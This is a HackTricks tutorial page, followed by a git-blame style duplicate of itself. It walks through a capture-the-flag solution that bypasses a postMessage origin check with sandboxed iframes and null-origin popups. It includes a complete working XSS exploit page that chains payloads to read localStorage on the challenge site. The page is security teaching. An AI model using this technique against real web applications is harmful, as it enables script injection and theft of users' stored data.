hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md

# Bypassing SOP with Iframes - 1

<details>

<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## Iframes in SOP-1

In this [**challenge**](https://github.com/terjanq/same-origin-xss) created by [**NDevTK**](https://github.com/NDevTK) and [**Terjanq**](https://github.com/terjanq) you need you need to exploit a XSS in the coded

```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
  const data = e.data;
  if (e.origin !== window.origin && data.identifier !== identifier) return;
  if (data.type === 'render') {
    renderContainer.innerHTML = data.body;
  }
}
```

The main problem is that the [**main page**](https://so-xss.terjanq.me) uses DomPurify to send the `data.body`, so in order to send your own html data to that code you need to **bypass** `e.origin !== window.origin`.

Let's see the solution they propose.

### SOP bypass 1 (e.origin === null)

When `//example.org` is embedded into a **sandboxed iframe**, then the page's **origin** will be **`null`**, i.e. **`window.origin === null`**. So just by embedding the iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` we could **force the `null` origin**.

If the page was **embeddable** you could bypass that protection that way (cookies might also need to be set to `SameSite=None`).

### SOP bypass 2 (window.origin === null)

The lesser known fact is that when the **sandbox value `allow-popups` is set** then the **opened popup** will **inherit** all the **sandboxed attributes** unless `allow-popups-to-escape-sandbox` is set.\
So, opening a **popup** from a **null origin** will make **`window.origin`** inside the popup also **`null`**.

### Challenge Solution

Therefore, for this challenge, one could **create** an **iframe**, **open a popup** to the page with the vulnerable XSS code handler (`/iframe.php`), as `window.origin === e.origin` because both are `null` it's possible to **send a payload that will exploit the XSS**.

That **payload** will get the **identifier** and send a **XSS** it **back to the top page** (the page that open the popup), **which** will **change location** to the **vulnerable** `/iframe.php`. Because the identifier is known, it doesn't matter that the condition `window.origin === e.origin` is not satisfied (remember, the origin is the **popup** from the iframe which has **origin** **`null`**) because `data.identifier === identifier`. Then, the **XSS will trigger again**, this time in the correct origin.

```html
<body>
  <script>
    f = document.createElement('iframe');
    
    // Needed flags
    f.sandbox = 'allow-scripts allow-popups allow-top-navigation';
    
    // Second communication with /iframe.php (this is the top page relocated)
    // This will execute the alert in the correct origin
    const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
      x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
    },1000);`.replaceAll('\n',' ');
   
   // Initial communication
   // Open /iframe.php in a popup, both iframes and popup will have "null" as origin
   // Then, bypass window.origin === e.origin to steal the identifier and communicate
   // with the top with the second XSS payload
    f.srcdoc = `
    <h1>Click me!</h1>
    <script>
      onclick = e => {
        let w = open('https://so-xss.terjanq.me/iframe.php');
        onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
        setTimeout(_ => {
          w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
        }, 1000);
      };
    <\/script>
    `
    document.body.appendChild(f);
  </script>
</body>
```

<details>

<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			`# Bypassing SOP with Iframes - 1`

			`<details>`

change 2023-04-05 12:02:54 +00:00			`<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
hacktricks twitch 2022-12-05 22:29:21 +00:00			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`

			`## Iframes in SOP-1`

			`In this [challenge](https://github.com/terjanq/same-origin-xss) created by [NDevTK](https://github.com/NDevTK) and [Terjanq](https://github.com/terjanq) you need you need to exploit a XSS in the coded`

			```javascript
			`const identifier = '4a600cd2d4f9aa1cfb5aa786';`
			`onmessage = e => {`
			`const data = e.data;`
			`if (e.origin !== window.origin && data.identifier !== identifier) return;`
			`if (data.type === 'render') {`
			`renderContainer.innerHTML = data.body;`
			`}`
			`}`
			```

			The main problem is that the [main page](https://so-xss.terjanq.me) uses DomPurify to send the `data.body`, so in order to send your own html data to that code you need to bypass `e.origin !== window.origin`.

			`Let's see the solution they propose.`

			`### SOP bypass 1 (e.origin === null)`

			When `//example.org` is embedded into a sandboxed iframe, then the page's origin will be `null`, i.e. `window.origin === null`. So just by embedding the iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` we could force the `null` origin.

			If the page was embeddable you could bypass that protection that way (cookies might also need to be set to `SameSite=None`).

			`### SOP bypass 2 (window.origin === null)`

			The lesser known fact is that when the sandbox value `allow-popups` is set then the opened popup will inherit all the sandboxed attributes unless `allow-popups-to-escape-sandbox` is set.\
			So, opening a popup from a null origin will make `window.origin` inside the popup also `null`.

			`### Challenge Solution`

			Therefore, for this challenge, one could create an iframe, open a popup to the page with the vulnerable XSS code handler (`/iframe.php`), as `window.origin === e.origin` because both are `null` it's possible to send a payload that will exploit the XSS.

			That payload will get the identifier and send a XSS it back to the top page (the page that open the popup), which will change location to the vulnerable `/iframe.php`. Because the identifier is known, it doesn't matter that the condition `window.origin === e.origin` is not satisfied (remember, the origin is the popup from the iframe which has origin `null`) because `data.identifier === identifier`. Then, the XSS will trigger again, this time in the correct origin.

			```html
			`<body>`
			`<script>`
			`f = document.createElement('iframe');`

			`// Needed flags`
			`f.sandbox = 'allow-scripts allow-popups allow-top-navigation';`

			`// Second communication with /iframe.php (this is the top page relocated)`
			`// This will execute the alert in the correct origin`
			const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
			`x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');`
			},1000);`.replaceAll('\n',' ');

			`// Initial communication`
			`// Open /iframe.php in a popup, both iframes and popup will have "null" as origin`
			`// Then, bypass window.origin === e.origin to steal the identifier and communicate`
			`// with the top with the second XSS payload`
			f.srcdoc = `
			`<h1>Click me!</h1>`
			`<script>`
			`onclick = e => {`
			`let w = open('https://so-xss.terjanq.me/iframe.php');`
			`onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';`
			`setTimeout(_ => {`
			`w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')`
			`}, 1000);`
			`};`
			`<\/script>`
			`
			`document.body.appendChild(f);`
			`</script>`
			`</body>`
			```

			`<details>`

change 2023-04-05 12:02:54 +00:00			`<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
hacktricks twitch 2022-12-05 22:29:21 +00:00			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`